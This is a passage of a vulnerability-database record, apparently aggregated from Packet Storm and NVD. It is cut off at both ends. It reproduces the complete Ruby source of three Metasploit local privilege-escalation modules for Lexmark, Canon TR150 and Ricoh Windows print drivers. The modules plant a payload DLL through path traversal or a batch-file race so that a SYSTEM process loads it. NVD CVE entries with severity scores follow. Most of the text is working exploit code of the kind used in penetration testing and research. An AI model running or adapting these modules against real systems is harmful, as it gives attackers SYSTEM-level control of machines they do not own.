'2021-35449'], \n[ 'URL', 'http://support.lexmark.com/index?page=content&id=TE953'], \n[ 'URL', 'https://github.com/jacob-baines/concealed_position'], \n[ 'URL', 'https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Jacob%20Baines%20-%20Bring%20Your%20Own%20Print%20Driver%20Vulnerability.pdf'] \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } \n] \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ SERVICE_RESOURCE_LOSS ] \n}, \n'DisclosureDate' => '2021-07-15', \n'DefaultTarget' => 0 \n) \n) \nregister_options( \n[OptString.new('DRIVERNAME', [false, 'The name of the Lexmark driver to exploit', ''])] \n) \nself.needs_cleanup = true \nend \n \n# Check to see if a there are Lexmark drivers in the driver store. \n# If there are, validate that they are similar to the ones we want \n# to exploit. The user can specify the driver they'd like to exploit \n# as option. Otherwise, the first vulnerable driver from the driver store \n# will be selected. \ndef check \nres = cmd_exec('pnputil.exe /enum-drivers') \nm = res.scan(%r{Published Name: ([^.]*\\.inf)\\r\\nOriginal Name: lmu.*?.inf\\r\\nProvider Name: Lexmark International\\r\\nClass Name: Printers\\r\\nClass GUID: {4d36e979-e325-11ce-bfc1-08002be10318}\\r\\nDriver Version: (\\d+)/\\d+/(\\d+) \\d+\\.\\d+\\.\\d+\\.\\d+}m) \n \nreturn CheckCode::Safe('No Lexmark print drivers in the driver store') if m.empty? \n \n# known vulnerable drivers \ndriver_list = ['Lexmark Universal v2', 'Lexmark Universal v2 XL', 'Lexmark Printer Software G2', 'Lexmark Printer Software G2 XL'] \nfound_drivers = [] \n \nfor path in m \nprint_status(\"Lexmark driver published at #{path[0]}\") \ninf_text = read_file(\"C:\\\\Windows\\\\inf\\\\#{path[0]}\") \nfor driver in driver_list \nif inf_text.include?(driver) \nfound_drivers.push(driver) \nend \nend \nend \n \nreturn CheckCode::Safe('None of the Lexmark drivers in the driver store are known to be vulnerable') if found_drivers.empty? \n \nfound_drivers = found_drivers.uniq \nprint_status(\"Found #{found_drivers.length} possible options:\") \nfor driver in found_drivers \nprint_status(\"\\t#{driver}\") \nend \n \n# select driver to exploit \n@drvr_name = datastore['DRIVERNAME'] \nif @drvr_name.empty? \n@drvr_name = found_drivers[0] \nprint_status(\"No user provided DRIVERNAME. Defaulting to \\\"#{@drvr_name}\\\"\") \nelse \nreturn CheckCode::Safe('The user specified driver is not in the driver store') unless found_drivers.include?(@drvr_name) \n \nprint_status('The user selected driver was in the driver store') \nend \n \n@gdl_file = 'C:\\\\ProgramData\\\\' + @drvr_name + '\\\\Universal Color Laser.gdl' \nCheckCode::Detected('A potentially vulnerable Lexmark print driver is available.') \nend \n \ndef do_add_printer_vbs \nscript_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{@drvr_name}\\\" -r \\\"lpt1:\\\"\" \nprint_status(\"Adding printer #{@printer_name}...\") \ncmd_exec(script_cmd) \nend \n \ndef add_printer \nfail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) \nfail_with(Failure::NotFound, 'No driver name set') if @drvr_name.empty? \n \n# If the driver has never been installed, then the vulnerable file won't exist. So let's \n# install once if necessary \nif !file?(@gdl_file) \ndo_add_printer_vbs \ncleanup \nend \n \nreturn CheckCode::Safe('No Lexmark GDL file found') unless file?(@gdl_file) \n \n# dump exploit dll to disk \ndll_data = generate_payload_dll \ntemp_path = expand_path('%TEMP%\\\\') \ntemp_path.concat(Rex::Text.rand_text_alpha(5..9)) \ntemp_path.concat('.dll') \nvprint_status(\"Writing dll to #{temp_path}\") \nwrite_file(temp_path, dll_data) \nregister_files_for_cleanup(temp_path) \n \n# replace a DLL path to one in our control \ntraversal_path = '..\\\\..\\\\..\\\\..\\\\..\\\\..' \ntraversal_path.concat(temp_path[2..-1]) \ntext = read_file(@gdl_file) \nnew_contents = text.gsub(/unires.dll/, traversal_path) \nwrite_file(@gdl_file, new_contents) \n \n# trigger exploitaiton \ndo_add_printer_vbs \n \n# reset the path \ntext = read_file(@gdl_file) \nnew_contents = text.gsub(traversal_path, 'unires.dll') \nwrite_file(@gdl_file, new_contents) \nrescue Rex::Post::Meterpreter::RequestError => e \nfail_with(Failure::Unknown, \"#{e.class} #{e.message}\") \nend \n \ndef exploit \nfail_with(Failure::None, 'Already running as SYSTEM') if is_system? \n \nfail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' \n \nif sysinfo['Architecture'] != payload.arch.first \nfail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver') \nend \n \n@printer_name = Rex::Text.rand_text_alpha(5..9) \n@script_path = 'C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs' \nadd_printer \nend \n \ndef cleanup \nprint_status(\"Deleting printer #{@printer_name}\") \ndelete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\" \ncmd_exec(delete_cmd) \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163811/lexmark_driver_privesc.rb.txt"}, {"lastseen": "2021-08-11T17:16:47", "description": "", "cvss3": {}, "published": "2021-08-11T00:00:00", "type": "packetstorm", "title": "Canon TR150 Driver 3.71.2.10 Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38085"], "modified": "2021-08-11T00:00:00", "id": "PACKETSTORM:163795", "href": "https://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Canon Driver Privilege Escalation', \n'Description' => %q{ \nCanon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files \nwithin the \"CanonBJ\" directory and its subdirectories. By overwriting the DLL at \nC:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll \nwith a malicious DLL at the right time whilst running the C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs \nscript to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program, \nwhich runs as NT AUTHORITY\\SYSTEM, to successfully load the malicious DLL. Successful exploitation \nwill grant attackers code execution as the NT AUTHORITY\\SYSTEM user. \n \nThis module leverages the prnmngr.vbs script \nto add and delete printers. Multiple runs of this \nmodule may be required given successful exploitation \nis time-sensitive. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Jacob Baines', # discovery, PoC, module \n'Shelby Pace' # original Ricoh module \n], \n'References' => \n[ \n['CVE', '2021-38085'], \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } \n] \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'Stability' => [ SERVICE_RESOURCE_LOSS ] \n}, \n'DisclosureDate' => '2021-08-07', \n'DefaultTarget' => 0 \n) \n) \n \nself.needs_cleanup = true \nend \n \ndef check \n@driver_path = '' \ndir_name = 'C:\\\\ProgramData\\\\CanonBJ\\\\IJPrinter\\\\CNMWINDOWS\\\\Canon TR150 series' \n \nreturn CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name) \n \nlanguage_dirs = dir(dir_name) \n \nreturn CheckCode::Detected(\"Detected Canon driver directory, but no language files. Its likely the driver is installed but a printer hasn't been added yet\") unless language_dirs.length \n \n@driver_path = dir_name \n@driver_path.concat('\\\\LanguageModules\\\\040C') \nres = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\") \nvulnerable = res.match(/\\\\Users:(?:\\(I\\))?\\(OI\\)\\(CI\\)\\(F\\)/) \n \nreturn CheckCode::Safe(\"#{@driver_path} directory does not exist or does not grant Users full permissions\") unless vulnerable \n \nvprint_status(\"Vulnerable language driver directory: #{@driver_path}\") \nCheckCode::Appears('Canon language driver directory grants Users full permissions') \nend \n \ndef add_printer(driver_name) \nfail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) \n \ndll_data = generate_payload_dll \ndll_path = \"#{@driver_path}\\\\CNMurGE.dll\" \n \ntemp_path = expand_path('%TEMP%\\\\CNMurGE.dll') \n \nbat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\") \ncp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\" \n \n# this script monitors the target dll for modification and then copies \n# over our malicious dll. As this is a time based attack, it won't \n# always be succuessful! \nbat_file = <<~HEREDOC \nattrib -a \"#{dll_path}\" \n:repeat \nfor %%i in (\"#{dll_path}\") do echo %%~ai | find \"a\" >nul || goto :repeat \ntimeout /t 1 \n#{cp_cmd} \nattrib -a \"#{dll_path}\" \nHEREDOC \n \nprint_status(\"Dropping batch script to #{bat_file_path}\") \nwrite_file(bat_file_path, bat_file) \n \nprint_status(\"Writing DLL file to #{temp_path}\") \nwrite_file(temp_path, dll_data) \nregister_files_for_cleanup(bat_file_path, temp_path) \n \nscript_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\" \nbat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\" \nvprint_status('Executing the batch script...') \nclient.sys.process.execute(bat_cmd, nil, { 'Hidden' => true }) \n \nprint_status(\"Adding printer #{@printer_name}...\") \ncmd_exec(script_cmd) \nrescue Rex::Post::Meterpreter::RequestError => e \nfail_with(Failure::Unknown, \"#{e.class} #{e.message}\") \nend \n \ndef exploit \nfail_with(Failure::None, 'Already running as SYSTEM') if is_system? \n \nfail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' \n \nif sysinfo['Architecture'] != payload.arch.first \nfail_with(Failure::BadConfig, 'The payload should use the same architecture as the target machine') \nend \n \n@printer_name = Rex::Text.rand_text_alpha(5..9) \n@script_path = 'C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs' \ndrvr_name = 'Canon TR150 series' \n \nadd_printer(drvr_name) \nend \n \ndef cleanup \nprint_status(\"Deleting printer #{@printer_name}\") \nsleep(3) \ndelete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\" \nclient.sys.process.execute(delete_cmd, nil, { 'Hidden' => true }) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163795/canon_driver_privesc.rb.txt"}, {"lastseen": "2020-02-09T22:44:25", "description": "", "cvss3": {}, "published": "2020-02-07T00:00:00", "type": "packetstorm", "title": "Ricoh Driver Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19363"], "modified": "2020-02-07T00:00:00", "id": "PACKETSTORM:156251", "href": "https://packetstormsecurity.com/files/156251/Ricoh-Driver-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/exploit/exe' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Ricoh Driver Privilege Escalation', \n'Description' => %q( \nVarious Ricoh printer drivers allow escalation of \nprivileges on Windows systems. \n \nFor vulnerable drivers, a low-privileged user can \nread/write files within the `RICOH_DRV` directory \nand its subdirectories. \n \n`PrintIsolationHost.exe`, a Windows process running \nas NT AUTHORITY\\SYSTEM, loads driver-specific DLLs \nduring the installation of a printer. A user can \nelevate to SYSTEM by writing a malicious DLL to \nthe vulnerable driver directory and adding a new \nprinter with a vulnerable driver. \n \nThis module leverages the `prnmngr.vbs` script \nto add and delete printers. Multiple runs of this \nmodule may be required given successful exploitation \nis time-sensitive. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Alexander Pudwill', # discovery & PoC \n'Pentagrid AG', # PoC \n'Shelby Pace' # msf module \n], \n'References' => \n[ \n[ 'CVE', '2019-19363'], \n[ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/'] \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'Payload' => \n{ \n}, \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[[ \n'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } \n]], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'Stability' => [ SERVICE_RESOURCE_LOSS ] \n}, \n'DisclosureDate' => \"Jan 22 2020\", \n'DefaultTarget' => 0 \n)) \n \nself.needs_cleanup = true \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [ false, 'Override check result', false ]) \n]) \nend \n \ndef check \ndir_name = \"C:\\\\ProgramData\\\\RICOH_DRV\" \n \nreturn CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name) \ndriver_names = dir(dir_name) \n \nreturn CheckCode::Detected(\"Detected Ricoh driver directory, but no installed drivers\") unless driver_names.length \n \nvulnerable = false \ndriver_names.each do |driver_name| \nfull_path = \"#{dir_name}\\\\#{driver_name}\\\\_common\\\\dlz\" \nnext unless directory?(full_path) \n@driver_path = full_path \n \nres = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\") \nnext unless res.include?('Everyone:') \nnext unless res.match(/\\(F\\)/) \n \nvulnerable = true \nbreak \nend \n \nreturn CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable \n \nvprint_status(\"Vulnerable driver directory: #{@driver_path}\") \nCheckCode::Appears('Ricoh driver directory has full permissions') \nend \n \ndef add_printer(driver_name) \nfail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) \n \ndll_data = generate_payload_dll \ndll_path = \"#{@driver_path}\\\\headerfooter.dll\" \n \ntemp_path = expand_path('%TEMP%\\\\headerfooter.dll') \nvprint_status(\"Writing dll to #{temp_path}\") \n \nbat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\") \ncp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\" \nbat_file = <<~HEREDOC \n:repeat \n#{cp_cmd} && goto :repeat \nHEREDOC \n \nwrite_file(bat_file_path, bat_file) \nwrite_file(temp_path, dll_data) \nregister_files_for_cleanup(bat_file_path, temp_path) \n \nscript_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\" \nbat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\" \nprint_status(\"Adding printer #{@printer_name}...\") \nclient.sys.process.execute(script_cmd, nil, { 'Hidden' => true }) \nvprint_status(\"Executing script...\") \ncmd_exec(bat_cmd) \nrescue Rex::Post::Meterpreter::RequestError => e \ne_log(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nend \n \ndef exploit \nfail_with(Failure::None, 'Already running as SYSTEM') if is_system? \n \nfail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' \n \nif sysinfo['Architecture'] != payload.arch.first \nfail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver') \nend \n \n@driver_path = '' \nunless check == CheckCode::Appears || datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override') \nend \n \n@printer_name = Rex::Text.rand_text_alpha(5..9) \n@script_path = \"C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs\" \ndrvr_name = @driver_path.split('\\\\') \ndrvr_name_idx = drvr_name.index('RICOH_DRV') + 1 \ndrvr_name = drvr_name[drvr_name_idx] \n \nadd_printer(drvr_name) \nend \n \ndef cleanup \nprint_status(\"Deleting printer #{@printer_name}\") \nRex.sleep(3) \ndelete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\" \nclient.sys.process.execute(delete_cmd, nil, { 'Hidden' => true }) \nend \nend \n`\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156251/ricoh_driver_privesc.rb.txt"}], "cve": [{"lastseen": "2023-05-23T15:33:01", "description": "The Lexmark Universal Print Driver version 2.15.1.0 and below, G2 driver 2.7.1.0 and below, G3 driver 3.2.0.0 and below, and G4 driver 4.2.1.0 and below are affected by a privilege escalation vulnerability. A standard low priviliged user can use the driver to execute a DLL of their choosing during the add printer process, resulting in escalation of privileges to SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T15:15:00", "type": "cve", "title": "CVE-2021-35449", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35449"], "modified": "2021-09-20T12:21:00", "cpe": ["cpe:/a:lexmark:g3_driver:3.2.0.0", "cpe:/a:lexmark:g2_driver:2.7.1.0", "cpe:/a:lexmark:g4_driver:4.2.1.0", "cpe:/a:lexmark:universal_print_driver:2.15.1.0"], "id": "CVE-2021-35449", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35449", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:lexmark:g3_driver:3.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:lexmark:g4_driver:4.2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:lexmark:g2_driver:2.7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:lexmark:universal_print_driver:2.15.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:37:53", "description": "The Canon TR150 print driver through 3.71.2.10 is vulnerable to a privilege escalation issue. During the add printer process, a local attacker can overwrite CNMurGE.dll and, if timed properly, the overwritten DLL will be loaded into a SYSTEM process resulting in escalation of privileges. This occurs because the driver drops a world-writable DLL into a CanonBJ %PROGRAMDATA% location that gets loaded by printisolationhost (a system process).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T18:15:00", "type": "cve", "title": "CVE-2021-38085", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38085"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:canon:pixma_tr150_firmware:3.71.2.10"], "id": "CVE-2021-38085", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38085", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canon:pixma_tr150_firmware:3.71.2.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-29T15:17:04", "description": "An issue was discovered in Ricoh (including Savin and Lanier) Windows printer drivers prior to 2020 that allows attackers local privilege escalation. Affected drivers and versions are: PCL6 Driver for Universal Print - Version 4.0 or later PS Driver for Universal Print - Version 4.0 or later PC FAX Generic Driver - All versions Generic PCL5 Driver - All versions RPCS Driver - All versions PostScript3 Driver - All versions PCL6 (PCL XL) Driver - All versions RPCS Raster Driver - All version", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-24T18:15:00", "type": "cve", "title": "CVE-2019-19363", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363"], "modified": "2023-02-10T16:59:00", "cpe": ["cpe:/a:ricoh:rpcs_driver:-", "cpe:/a:ricoh:postscript3_driver:-", "cpe:/a:ricoh:generic_pcl5_driver:-", "cpe:/a:ricoh:pc_fax_generic_driver:-", "cpe:/a:ricoh:rpcs_raster_driver:-", "cpe:/a:ricoh:pcl6_\\(pcl_xl\\)_driver:-"], "id": "CVE-2019-19363", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19363", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ricoh:rpcs_driver:-:*:*:*:*:*:*:*", "cpe:2.3:a:ricoh:pcl6_\\(pcl_xl\\)_driver:-:*:*:*:*:*:*:*", "cpe:2.3:a:ricoh:rpcs_raster_driver:-:*:*:*:*:*:*:*", "cpe:2.3:a:ricoh:generic_pcl5_driver:-:*:*:*:*:*:*:*", "cpe:2.3:a:ricoh:postscript3_driver:-:*:*:*:*:*:*:*", "cpe:2.3:a:ricoh:pc_fax_generic_driver:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T22:09:25", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2019-19363. Reason: This candidate is a reservation duplicate of CVE-2019-19363. Notes: All CVE users should reference CVE-2019-19363 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.", "cvss3": {}, "published": "2019-12-05T16:15:00", "type": "cve", "title": "CVE-2019-19008", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2019-19008", "CVE-2019-19363"], "modified": "2019-12-05T16:15:00", "cpe": [], "id": "CVE-2019-19008", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19008", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2023-05-30T14:31:13", "description": "A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files.To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.The update addresses the vulnerability by correcting how Windows handles cabinet files., aka 'Windows Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1300", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1300"], "modified": "2020-06-16T13:33:00", "cpe": ["cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2020-1300", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1300", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", 